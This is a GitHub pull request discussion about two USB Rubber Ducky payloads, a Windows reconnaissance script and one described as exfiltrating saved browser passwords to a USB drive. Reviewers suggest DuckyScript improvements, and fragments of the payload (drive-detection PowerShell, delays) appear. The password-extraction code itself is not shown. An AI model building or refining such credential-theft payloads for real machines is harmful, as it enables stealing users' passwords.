Added Vulnerability Scanning Script And Password Exfiltration For Various Browsers #452
Conversation
|
These appear to be written for the flipper based on some common patterns you used, and lack of best practices for USB Rubber Ducky. So I'd like to confirm is this the case? @MarkCyber |
dallaswinger
added
the
requires clarification
|
My apologies for the issues. I have made some changes and will apply/send a new pull request shortly |
|
@dallaswinger but just to confirm, what other changes can be made to ensure it fits the best practices for USB Rubber Ducky? I figured it was the same scripting methodology and just needed to be formatted differently.. am I missing something? |
| REM %%%%%%%%%%%%%% Description: This script exfiltrates credentials %%%%%%%%%%%%%% | ||
| REM %%%%%%%%%%%%%% Target: Firefox, Chrome, Edge on Windows Machines %%%%%%%%%%%%%% | ||
| REM %%%%%%%%%%%%%% Category: Exfiltration %%%%%%%%%%%%%% | ||
| REM %%%%%%%%%%%%%% This script requires a secondary USB named "MYUSB" to save credentials to %%%%%%%%%%%%%% |
There was a problem hiding this comment.
The Ducky can do this. you can specify ATTACKMODE HID STORAGE for the ducky to act as both a storage device and a HID device
| ENTER | ||
| DELAY 1500 | ||
| REM Check if the USB drive exists | ||
| STRING $usbDrive = Get-WmiObject Win32_Volume ^| Where-Object { $_.Label -eq 'MYUSB' } ^| Select-Object -ExpandProperty DriveLetter; |
There was a problem hiding this comment.
The default drive label for the Ducky is DUCKY but for users who might not be using the default label I would suggest using a DEFINE at the start of the payload.
you would do this by adding to the top of the payload:
DEFINE #DUCKY_DRIVE_LABEL DUCKY
and then update references to the drive label to be something like (in the case of this line):
STRING $usbDrive = Get-WmiObject Win32_Volume ^| Where-Object { $_.Label -eq '#DUCKY_DRIVE_LABEL DUCKY' } ^| Select-Object -ExpandProperty DriveLetter;
You can also use STRINGLN rather than STRING STRINGLN acts just like STRING ENTER.
| DELAY 500 | ||
| STRING cd $usbDrive | ||
| ENTER | ||
| DELAY 500 |
There was a problem hiding this comment.
I see you are using a lot of DELAY 500 you can set a default delay that applies to every line unless other wise defined. You can do this buy adding DEFAULT_DELAY 500 to the start of your payload.
| REM %%%%%%%%%%%%%% Description: This script scans for vulnerabilities %%%%%%%%%%%%%% | ||
| REM %%%%%%%%%%%%%% Target: Windows machines with admin access %%%%%%%%%%%%%% | ||
| REM %%%%%%%%%%%%%% Category: Recon %%%%%%%%%%%%%% | ||
| REM %%%%%%%%%%%%%% This script requires a secondary USB named "MYUSB" to save credentials to %%%%%%%%%%%%%% |
There was a problem hiding this comment.
again, the Ducky can do this. you can specify ATTACKMODE HID STORAGE for the ducky to act as both a storage device and a HID device.
| DELAY 200 | ||
| REM Create the PowerShell script in memory and execute it | ||
| DELAY 200 | ||
| STRING $usbName = "MYUSB" |
There was a problem hiding this comment.
This will not work. this will output as $usbName = "MYUSB" being typed. The way to do this would be using DEFINE at the start of your payload. For example,
DEFINE #DUCKY_DRIVE_LABEL DUCKY
STRING $usbName = "#DUCKY_DRIVE_LABEL DUCKY"
then you can call this definition
| STRING $owner = (Get-WmiObject Win32_ComputerSystem).UserName | ||
| DELAY 200 | ||
| ENTER | ||
| DELAY 200 |
There was a problem hiding this comment.
You can use DEFAULT_DELAY to clean up all these DELAY 200.
Added 2 scripts, one that scans for vulnerabilities in a Windows machine via checking for open ports, misconfigured/missing updates, password policy, firewall rules and antivirus status, logs, and much more. Also added another script that exfiltrates saved passwords from chrome, Firefox and edge to secondary usb.